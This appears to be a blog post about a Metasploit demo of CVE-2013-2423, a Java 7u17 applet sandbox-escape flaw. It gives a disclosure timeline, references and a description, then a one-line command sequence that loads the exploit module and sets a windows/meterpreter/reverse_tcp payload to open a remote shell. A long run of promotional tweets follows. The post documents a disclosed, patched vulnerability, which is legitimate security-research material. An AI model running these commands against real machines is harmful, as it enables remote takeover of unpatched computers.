Timeline :
Vulnerability discovered and reported to vendor by Jeroen Frijters
Vulnerability corrected in April CPU the 2013-04-16
Vulnerability publicly disclosed by Jeroen Frijters the 2013-04-17
Metasploit PoC provided the 2013-04-20
PoC provided by :
Jeroen Frijters
juan vazquez
Reference(s) :
Oracle Java April 2013 CPU
CVE-2013-2423
OSVDB-92348
BID-59162
Affected version(s) :
JDK and JRE 7 Update 17 and earlier
Tested on Windows XP Pro SP3 with :
JDK and JRE 7 Update 17
Description :
This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.
Commands :
use exploit/multi/browser/java_jre17_reflection_types set SRVHOST 192.168.178.36 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit getuid sysinfo
#Java 7u17 Applet Reflection Type Confusion RCE #Metasploit Demo | http://t.co/jvgEobe33z #Security https://t.co/OjOwY5GHx2
RT @eromang: #Metasploit Demo of CVE-2013-2423 – #Oracle #Java 7u17 Applet Reflection Type Confusion RCE http://t.co/rGPC6zMK7z #infosec
#Java 7u17 Applet Reflection Type Confusion #RCE #Metasploit Demo | Eric Romang http://t.co/LeU3TlejBh
#Java 7u17 Applet Reflection Type Confusion #RCE #Metasploit Demo | Eric Romang http://t.co/xQPdLNzypa
RT @eromang: #Metasploit Demo of CVE-2013-2423 – #Oracle #Java 7u17 Applet Reflection Type Confusion RCE http://t.co/rGPC6zMK7z #infosec
RT @eromang: #Metasploit Demo of CVE-2013-2423 – #Oracle #Java 7u17 Applet Reflection Type Confusion RCE http://t.co/rGPC6zMK7z #infosec
CVE-2013-2423 – Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo: http://t.co/t0DF0dE40s
RT @eromang: #Metasploit Demo of CVE-2013-2423 – #Oracle #Java 7u17 Applet Reflection Type Confusion RCE http://t.co/rGPC6zMK7z #infosec
RT @unixfreaxjp: Java 7u17 Applet Reflection Type Confusion RCE Metasploit #Demo by @eromang http://t.co/XmUVjytSf9 http://t.co/cmYjHAIMc4
RT @unixfreaxjp: #Exploit : Java 7u17 Applet Reflection Type Confusion RCE Metasploit #Demo by @eromang http://t.co/AxOmgXZPCt #Video https…
RT @unixfreaxjp: #Exploit : Java 7u17 Applet Reflection Type Confusion RCE Metasploit #Demo by @eromang http://t.co/AxOmgXZPCt #Video https…
RT @unixfreaxjp: #Exploit : Java 7u17 Applet Reflection Type Confusion RCE Metasploit #Demo by @eromang http://t.co/AxOmgXZPCt #Video https…
RT @unixfreaxjp: #Exploit : Java 7u17 Applet Reflection Type Confusion RCE Metasploit #Demo by @eromang http://t.co/AxOmgXZPCt #Video https…
RT @unixfreaxjp: #Exploit : Java 7u17 Applet Reflection Type Confusion RCE Metasploit #Demo by @eromang http://t.co/AxOmgXZPCt #Video https…
#Exploit : Java 7u17 Applet Reflection Type Confusion RCE Metasploit #Demo by @eromang http://t.co/AxOmgXZPCt #Video https://t.co/fvHZhOTY3V
RT @Hfuhs: Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo – http://t.co/ZZljqPfLUt
[msf xploit demo] http://t.co/wDPU9e96Tl
Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo: http://t.co/GZOKi6e6K8 #infosec
Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo – http://t.co/ZZljqPfLUt